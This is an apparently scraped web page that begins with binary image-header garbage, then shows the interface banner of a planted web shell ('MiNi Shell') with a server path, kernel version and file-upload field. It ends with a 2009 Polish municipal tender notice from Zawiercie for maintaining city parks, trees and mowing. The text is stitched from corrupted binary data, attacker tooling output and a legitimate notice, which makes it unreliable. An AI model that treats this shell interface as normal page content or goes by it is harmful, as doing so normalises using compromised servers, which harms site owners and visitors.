JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090324/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090324/74914-N-2009.html

<p class="kh_header"><b>Zawiercie: Utrzymanie i pielęgnacja terenów zieleni miejskiej w Zawierciu - 2009 r.:
Zadanie (część) nr 1	Utrzymanie i pielęgnacja zieleni niskiej i średniej na
				terenach objętych stałą pielęgnacją o powierzchni
				16,6808 ha (166 808 m2).
Zadanie (część) nr 2	Przegląd drzew nad ciągami pieszymi na terenach
				zieleni miejskiej podlegających stałej pielęgnacji wraz
				z wycinką 15 drzew oraz pielęgnacja 30 drzew 
				o średnicy mierzonej na wysokości 130 cm
				przekraczającej 41 cm.
Zadanie (część) nr 3	Koszenia na terenach gminnych nie podlegających
				stałej pielęgnacji.</b><br>
<b>Numer ogłoszenia: 74914 - 2009; data zamieszczenia: 24.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Zawiercie , ul. Leśna 2, 42-400 Zawiercie, woj. śląskie, tel. 032 6722684, faks 032 6721513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.eu</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie i pielęgnacja terenów zieleni miejskiej w Zawierciu - 2009 r.:
Zadanie (część) nr 1	Utrzymanie i pielęgnacja zieleni niskiej i średniej na
				terenach objętych stałą pielęgnacją o powierzchni
				16,6808 ha (166 808 m2).
Zadanie (część) nr 2	Przegląd drzew nad ciągami pieszymi na terenach
				zieleni miejskiej podlegających stałej pielęgnacji wraz
				z wycinką 15 drzew oraz pielęgnacja 30 drzew 
				o średnicy mierzonej na wysokości 130 cm
				przekraczającej 41 cm.
Zadanie (część) nr 3	Koszenia na terenach gminnych nie podlegających
				stałej pielęgnacji..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest utrzymanie i pielęgnacja terenów zieleni miejskiej                          w Zawierciu - 2009 r.:

Zadanie (część) nr 1	
Utrzymanie i pielęgnacja zieleni niskiej i średniej na terenach objętych stałą pielęgnacją o powierzchni 16,6808 ha (166 808 m2).

Zadanie to będzie obejmować następujące czynności:
- pielęgnację trawników (o powierzchni 141 787 m2),
- wygrabianie liści z trawników jesienią (o powierzchni  141 787 m2),
- wykonanie obsady kwiatowej na 6 rabatach sezonowych i w 22 donicach 
(powierzchni  do obsady 866,5 m2) 43 325 sztukami kwiatów sezonowych:
x szałwia		- 21 655 sztuk, 
x aksamitka		- 12 050 sztuk,
x dalia			-   5 950 sztuk, 
x starzec 		-   2 250 sztuk, 
x gazania 		-   1 420 sztuk, 
- pielęgnację kwiatów sezonowych na 6 rabatach i w 22 donicach (o powierzchni  
 866,5 m2), 
- pielęgnację bylin na rabatach (o powierzchni 88 m2),
- pielęgnację rabat obsadzonych różami 990 sztuk,
- wykonanie obsady bylinami zadarniającymi na rabatach cebulowych (powierzchnia 
53 m2),
- renowację 1 000 m2 trawnika w Parku im. Adama Mickiewicza,
- pielęgnację żywopłotów (o powierzchni 6653 m2),
- konserwację koryta rzeki Warty na terenie parków Mickiewicza i Kościuszki,
- utrzymanie czystości i porządku na terenach zieleni miejskiej (o powierzchni 16,6808 ha), 
- likwidację rabaty różanej (o powierzchni 19 m2) wraz z zastąpieniem jej trawnikiem,
- odmłodzenie skupin krzewów (o powierzchni 180 m2),
- wykonanie rabaty sezonowej koło pomnika Mickiewicza (o powierzchni 49 m2),
- usuwanie przez Wykonawcę na bieżąco odpadów ze sprzątania oraz resztek roślinnych pochodzących z wykonywanych zabiegów pielęgnacyjnych,
- konserwację 124 betonowo - drewnianych ławek na terenach zieleni podlegających stałej pielęgnacji, 
Wykonawca uwzględni koszt wody niezbędnej do realizacji przedmiotu zamówienia, który rozliczany będzie z Zamawiającym na podstawie wskazań liczników wodomierzowych zlokalizowanych na terenach zieleni. Strony ustalają, że w ciągu 14 dni do daty podpisania umowy Zamawiający przekaże Wykonawcy klucze do studzienek wodomierzowych zlokalizowanych na tych terenach. Z dniem przekazania kluczy Wykonawca ponosi odpowiedzialność za stan i dostępność do wymienionych studzienek. Zamawiający obciąży Wykonawcę kosztami pobranej wody z wymienionych studzienek na podstawie faktur, które otrzyma od przedsiębiorstwa wodociągowo-kanalizacyjnego odpowiedzialnego za dostawę wody.
Przedmiot umowy realizowany będzie przez Wykonawcę w oparciu o sporządzony przez Zamawiającego skonkretyzowany zakres prac na każde kolejne 14 dni, doręczony Wykonawcy bądź jego upoważnionemu przedstawicielowi z jednodniowym wyprzedzeniem.
Zobowiązany do osobistego stawiennictwa w siedzibie Zamawiającego, upoważniony przedstawiciel Wykonawcy potwierdzi pisemnie każdorazowo odbiór zakresu niezbędnych do wykonania prac.
Wykonawca zobowiązuje się pokryć ewentualne roszczenia użytkowników terenów zieleni za szkody będące następstwem zdarzeń losowych powstałych na skutek niewykonania bądź nienależytego wykonania obowiązków określonych w umowie oraz posiadać ubezpieczenie OC.

Wykaz terenów zieleni miejskiej podlegających utrzymaniu i pielęgnacji jest ujęty 
w załączniku nr 1 do SIWZ i wzoru umowy.
Wykaz rabat sezonowych i donic obsadzonych kwiatami sezonowymi jest ujęty 
w załączniku nr 2 do SIWZ i wzoru umowy.
Wykaz rabat bylinowych jest ujęty w załączniku nr 3 do SIWZ i wzoru umowy.
Wykaz rabat różanych jest ujęty w załączniku nr 4 do SIWZ i wzoru umowy.

Opis przedmiotu zamówienia zawarty został również w kosztorysie ślepym (przedmiarze robót) - załącznik nr 5 do SIWZ.

Zadanie (część) nr 2	
Przegląd drzew nad ciągami pieszymi na terenach zieleni miejskiej podlegających stałej pielęgnacji wraz z wycinką 15 drzew oraz pielęgnacja 30 drzew  o średnicy mierzonej na wysokości 130 cm przekraczającej 41 cm.

Zadanie to będzie obejmować następujące czynności:
- zabezpieczenie terenu prac z zachowaniem wymogów bezpieczeństwa użytkowników terenu zieleni oraz sąsiadujących drzew i infrastruktury z uwzględnieniem oznakowania 
i zabezpieczenia przed dostępem osób trzecich,
- trzykrotny przegląd terenów zieleni w okresie trwania umowy, zdjęcie suchych, pękniętych oraz zawieszonych konarów, pocięcie wyrwanych drzew lub części koron zerwanych na skutek gwałtownych zjawisk atmosferycznych,
- wycinkę 15 drzew wraz z karczowaniem metodą frezowania na głębokość 20 cm poniżej poziomu gruntu, wycięte drzewa mają zostać złożone w miejscu wskazanym przez Zamawiającego w odcinkach o długości 3 m, 
- uprzątnięcie terenu po zakończeniu prac z gałęzi i innych odpadów powstałych podczas realizacji zadania, 
- każdy z przeglądów realizowany będzie w terminie wskazanym przez Zamawiającego, 
- wykonanie cięć sanitarnych, prześwietlających i redukcyjnych na 30 drzewach,
- szczegółowy zakres wykonywanych cięć według wskazania Zamawiającego,
- uprzątnięcie terenu po zakończeniu prac z gałęzi i innych odpadów powstałych podczas realizacji zadania.

W zakresie pielęgnacji 30 drzew o średnicy mierzonej na wysokości 130 cm przekraczającej 41 cm:
- 30 drzew o średnicy mierzonej na wysokości 130 cm przekraczającej 41 cm wskazanych przez Zamawiającego do pielęgnacji to drzewa wymagające specjalistycznych zabiegów pielęgnacyjnych ze względu na utrzymanie charakteru Parku im. Mickiewicza, a ponadto ze względu na bezpieczeństwo użytkowników i sąsiadującej infrastruktury,
- drzewa zlokalizowane są w większości na skarpach oraz nieutwardzonych częściach Parku, do których utrudniony bądź niemożliwy jest dojazd  ze względu na miękkie podłoże i zlokalizowane tam skupiny krzewów bądź bliskość innych drzew,
- szacowana wysokość  miejsc prowadzenia prac zawierać się będzie pomiędzy 
10 a 24 m wysokości.
W związku z powyższym z uwagi na utrudnioną możliwość dojazdu do drzewa objętego pielęgnacją oraz zachowanie stanu sąsiadujących drzew i bezpieczeństwo  dla sąsiadującej infrastruktury, a także ze względu na powierzchnię terenu (trawniki i inne powierzchnie nieutwardzone, pochyłości i nierówności) Zamawiający wskazuje, że wykonanie zabiegów pielęgnacyjnych w oparciu o zwyżkę może okazać się bardzo trudne lub niemożliwe. Dlatego też wskazuje się na użycie lin do opuszczania odciętych konarów, ponieważ zrzucanie gałęzi bez asekuracji linowej doprowadzić może do zniszczenia konarów w niższych partiach drzewa (zadarcia kory i obłamania). 
Celem cięć jest przywrócenie właściwej statyki drzew, utrzymanie ich dobrego stanu zdrowotnego, zmniejszenie podatności na wyłamanie.
Cięcia do zastosowania to:  
x cięcia sanitarne - usunięcie konarów suchych porażonych i krzyżujących się,
x cięcia redukcyjne - zminimalizowanie obciążeń pnia przez równomierne rozmieszczenie masy korony, 
x cięcia prześwietlające - zmniejszenie masy korony tak, aby zmniejszyć podatność drzewa na uszkodzenia powstałe na skutek uderzeń wiatru.

Zakres prowadzonych cięć może doprowadzić do redukcji maksymalnie 20% masy korony.
Drzewa wyznaczone do pielęgnacji w większości należą do gatunków o twardym drewnie tj. robinie akacjowe, dęby szypułkowe, klon zwyczajny, wiąz szypułkowy: 
1.	robinia akacjowa na skarpie przy ul. Leśnej, 
2.	robinia akacjowa na trawniku koło skupin krzewów,
3.	lipa drobnolistna trawnik koło skupin krzewów, miękkie podłoże,
4.	lipa drobnolistna trawnik koło skupin krzewów, miękkie podłoże,
5.	robinia akacjowa na skarpie przy ul. Leśnej, 
6.	lipa drobnolistna mocno pochylona, 
7.	modrzew europejski - gęsta korona lekko pochylony, miękkie podłoże,
8.	lipa drobnolistna - ostre kont wrośnięcia konarów brak możliwości dojazdu z alejek, miękkie podłoże,
9.	dąb szypułkowy - brak możliwości dojazdu, miękkie podłoże skupiny krzewów,  
10.	dąb szypułkowy - brak możliwości dojazdu, miękkie podłoże skupiny krzewów,   
11.	dąb szypułkowy - dojazd z alejki ubytek po zerwanej części korony,
12.	olcha czarna - drzewo pochylone nad korytem Warty brak możliwości dojazdu          z alejek,
13.	dąb szypułkowy - drzewo pochylone nad korytem Warty brak możliwości dojazdu          z alejek,
14.	dąb szypułkowy - drzewo pochylone nad korytem Warty brak możliwości dojazdu          z alejek,
15.	dąb szypułkowy - dojazd z alejek,
16.	dąb szypułkowy - dojazd z alejek,
17.	dąb szypułkowy - możliwość dojazdu do drzewa z alejki,
18.	dąb szypułkowy - miękkie podłoże sąsiedztwo kręgu tanecznego, skupiny krzewów, korony sąsiadujących drzew,
19.	lipa drobnolistna - miękkie podłoże, sąsiedztwo skupin krzewów, 
20.	dąb szypułkowy - miękkie podłoże, nasadzenia hedery,
21.	wiąz szypułkowy - miękkie podłoże, rozłożysta korona częściowo nad korytem Warty,
22.	dąb szypułkowy - miękkie podłoże, rośnie na skarpie (0,5 -1 m wysokości), niesymetryczne korony rozbudowana nad posesjami prywatnymi, 
23.	dąb szypułkowy - miękkie podłoże, rośnie na skarpie (0,5 -1 m wysokości), niesymetryczne korony rozbudowana nad posesjami prywatnymi,
24.	dąb szypułkowy - miękkie podłoże, rośnie na skarpie (0,5 -1 m wysokości), niesymetryczne korony rozbudowana nad posesjami prywatnymi,
25.	klon zwyczajny - miękkie podłoże, rośnie na skarpie, niesymetryczne korony rozbudowana nad posesjami prywatnymi,
26.	dąb szypułkowy - miękkie podłoże, rośnie na skarpie, niesymetryczne korony rozbudowana nad posesjami prywatnymi,
27.	dąb szypułkowy - miękkie podłoże, rośnie na skarpie, niesymetryczne korony rozbudowana nad posesjami prywatnymi,
28.	dąb szypułkowy - miękkie podłoże, rośnie na skarpie, niesymetryczne korony rozbudowana nad posesjami prywatnymi,
29.	dąb szypułkowy - dojazd z alejki, korona rozbudowana w kierunku budynku,
30.	dąb szypułkowy - dojazd z alejki, sąsiedztwo budynku.

Wykonawca zobowiązuje się pokryć ewentualne roszczenia użytkowników terenów zieleni za szkody będące następstwem zdarzeń powstałych na skutek niewykonania bądź nienależytego wykonania obowiązków określonych w umowie oraz posiadać ubezpieczenie OC.

Zadanie (część) nr 3	
Koszenia na terenach gminnych nie podlegających stałej pielęgnacji.

Przedmiotowe zadanie obejmować będzie koszenia na terenach gminnych wraz z wygrabieniem i wywozem pokosu według wskazania Zamawiającego. 
Powierzchnia przewidywana do koszenia - 10 ha. 
Zamawiający zastrzega sobie prawo nieobjęcia zamówieniem do 50% powierzchni przedmiotu zamówienia, co wiąże się z tym, że wykonawca nie otrzyma w takim przypadku wynagrodzenia za przedmiotową część.
Przedmiot umowy będzie realizowany na podstawie każdorazowych pisemnych zleceń Zamawiającego, w których zostanie wskazana powierzchnia i lokalizacja terenu do skoszenia.
Wyznacza się termin realizacji każdorazowego zlecenia na 14 dni roboczych od daty jego otrzymania.
Wykonawca zobowiązuje się pokryć ewentualne roszczenia za szkody będące następstwem zdarzeń losowych powstałych na skutek niewykonania bądź nienależytego wykonania obowiązków określonych w umowie oraz posiadać ubezpieczenie OC..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 90.60.00.00-3, 77.21.14.00-6, 77.21.15.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu jest obowiązany wnieść wadium w wysokości:
a) zadanie (część) nr 1 - 3.000,00 zł,
b) zadanie (część) nr 2 - 1.000,00 zł.

Zadanie (część) nr 3 - brak wadium.

2.	Wadium musi obejmować cały okres związania ofertą, zgodnie z postanowieniami punktu IX SIWZ i może być wnoszone w jednej lub kilku następujących formach:
1)	pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
3)	gwarancjach bankowych;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
3.	Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto: 

URZĄD MIEJSKI w ZAWIERCIU
ING BANK ŚLĄSKI CBK/CZĘSTOCHOWA
NR KONTA: 80 1050 1142 1000 0008 0065 3354

z dopiskiem: Wadium w przetargu nieograniczonym na utrzymanie i pielęgnację terenów zieleni miejskiej w Zawierciu - 2009 r. - zadanie (część) nr (należy wpisać numer/y zadań (części), na które Wykonawca wpłaca wadium i składa ofertę).
Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku
zamawiającego.
4.	Jeżeli wykonawca wnosi wadium w:
1)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
2)	gwarancjach bankowych,
3)	gwarancjach ubezpieczeniowych,
4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158, z  późn. zm.)

w/w formy wadium muszą się znaleźć w kasie zamawiającego w terminie wyznaczonym
do składania ofert.
Oryginały dokumentów należy zdeponować w kasie Urzędu Miejskiego, a do oferty
należy dołączyć poświadczoną za zgodność kserokopię.

5.	Wadium wniesione w formach, o których mowa w pkt. VIII ust. 4 SIWZ musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez wykonawcę określone w art. 46 ust. 5 ustawy Prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych, spełniają wymogi art. 22 ust. 1 Pzp oraz spełniają warunki szczegółowe:

Zadanie (część) nr 1
1.	wykonali lub wykonują w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednokrotnie usługę polegającą na konserwacji i pielęgnacji terenów zieleni o wartości nie mniejszej niż 120.000,00 zł brutto, której należyte wykonanie zostało potwierdzone przez poprzedniego Zamawiającego;
2.	dysponują lub będą dysponowali co najmniej 6 osobami, 
3.	dysponują lub będą dysponowali sprzętem niezbędnym do realizacji zamówienia, tj.:
a.	ciągnikiem z przyczepą lub samochodem ciężarowym do 5 t - min. 1 szt.,
b.	kosiarkami spalinowymi - min. 4 szt.,
c.	kosami spalinowymi - min. 2 szt.,
4.	posiadają polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę minimum 100.000,00 zł.

Zadanie (część) nr 2
1.	wykonali lub wykonują w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednokrotnie usługę polegającą na pielęgnacji i wycince drzew o wartości nie mniejszej niż 20.000,00 zł brutto, której należyte wykonanie zostało potwierdzone przez poprzedniego Zamawiającego;
2.	dysponują lub będą dysponowali co najmniej 5 osobami, w tym co najmniej 1 osobą, która ukończyła kurs drugiego lub trzeciego stopnia pielęgnacji drzew ozdobnych oraz co najmniej 2 osobami, które posiadają ukończony kurs obsługi piły spalinowej;
3.	dysponują lub będą dysponowali sprzętem niezbędnym do realizacji zamówienia, tj.:
a.	ciągnikiem z przyczepą lub samochodem ciężarowym do 5 t - min. 1 szt.,
b.	piłami spalinowymi - min. 2 szt.,
c.	podnośnikiem koszowym o wysokości co najmniej 18 m - min. 1 szt.,
d.	rozdrabniarką do gałęzi - min. 1 szt.,
e.	frezarką do pni - min. 1 szt.
4.	posiadają polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę minimum 40.000,00 zł.

Zadanie nr 3
1.	dysponują lub będą dysponowali co najmniej 4 osobami, 
2.	dysponują lub będą dysponowali sprzętem niezbędnym do realizacji zamówienia, tj.:
a.	ciągnikiem z przyczepą lub samochodem ciężarowym do 5 t - min. 1 szt.,
b.	ciągnikową kosiarką rotacyjną - min. 1 szt.,
c.	kosiarkami spalinowymi - min. 2 szt.,
d.	kosami spalinowymi - min. 2 szt.
3.	posiadają polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę minimum 20.000,00 zł.

W przypadku składania oferty na więcej niż jedno zadanie (część):
- sumowaniu podlegają wartości, na którą powinna opiewać polisa lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności,
- należy spełnić każdy z warunków szczegółowych dotyczących danego zadania (części), przy czym w sytuacji zbieżności podobnych warunków, różniących się ilościowo - wystarczy spełnienie warunku dotyczącego zadania (części), w którym ilość jest określona bardziej rygorystycznie, jednakże w zakresie wykazania się doświadczeniem - ubieganie się o realizację zadań (części) nr 1 i 2 - jego zakres przedmiotowy powinien zawierać zarówno konserwację i pielęgnację terenów zieleni, jak też pielęgnację i wycinkę drzew.  

Dla przykładu:
W przypadku ubiegania się o realizacje zadań (części) nr 1-3, wykonawca powinien wykazać się spełnianiem następujących warunków szczegółowych (w tym przypadku maksymalnych dla całego postępowania):
1.	wykonali lub wykonują w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednokrotnie usługę polegającą na konserwacji i pielęgnacji terenów zieleni wraz z pielęgnacją i wycinką drzew o wartości nie mniejszej niż 120.000,00 zł brutto, której należyte wykonanie zostało potwierdzone przez poprzedniego Zamawiającego
alternatywnie
wykonali lub wykonują w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednokrotnie usługę polegającą na konserwacji i pielęgnacji terenów zieleni o wartości nie mniejszej niż 120.000,00 zł brutto oraz wykonali lub wykonują w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej jednokrotnie usługę polegającą na pielęgnacji i wycince drzew o wartości nie mniejszej niż 20.000,00 zł brutto,
których należyte wykonanie zostało potwierdzone przez poprzedniego Zamawiającego;
2.	dysponują lub będą dysponowali co najmniej 6 osobami, w tym co najmniej 1 osobą, która ukończyła kurs drugiego lub trzeciego stopnia pielęgnacji drzew ozdobnych oraz co najmniej 2 osobami, które posiadają ukończony kurs obsługi piły spalinowej;
3.	dysponują lub będą dysponowali sprzętem niezbędnym do realizacji zamówienia, tj.:
a.	ciągnikiem z przyczepą lub samochodem ciężarowym do 5 t - min. 1 szt.,
b.	ciągnikową kosiarką rotacyjną - min. 1 szt.,
c.	kosiarkami spalinowymi - min. 4 szt.,
d.	kosami spalinowymi - min. 2 szt.,
e.	piłami spalinowymi - min. 2 szt.,
f.	podnośnikiem koszowym o wysokości co najmniej 18 m - min. 1 szt.,
g.	rozdrabniarką do gałęzi - min. 1 szt.,
h.	frezarką do pni - min. 1 szt.
4.	posiadają polisę lub inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, na kwotę minimum 160.000,00 zł.

Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.
W/w  zostaną  uznane  za spełnione jeżeli Wykonawca złoży dokumenty i oświadczenie, o których mowa w pkt. VI specyfikacji..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu wykonawca musi załączyć do oferty następujące dokumenty:

1)	Oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 7 do SIWZ - w zakresie zadania (części) nr 1-3.
2)	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - w zakresie zadania (części) nr 1-3.
3)	Wykaz (sporządzony według wzoru stanowiącego załącznik nr 8 do SIWZ) wykonanych lub wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców. Do wykazu należy dołączyć dokumenty potwierdzające, że wskazane usługi zostały wykonane należycie.
Niniejsze dokumenty składa się w zakresie zadania (części) nr 1-2.
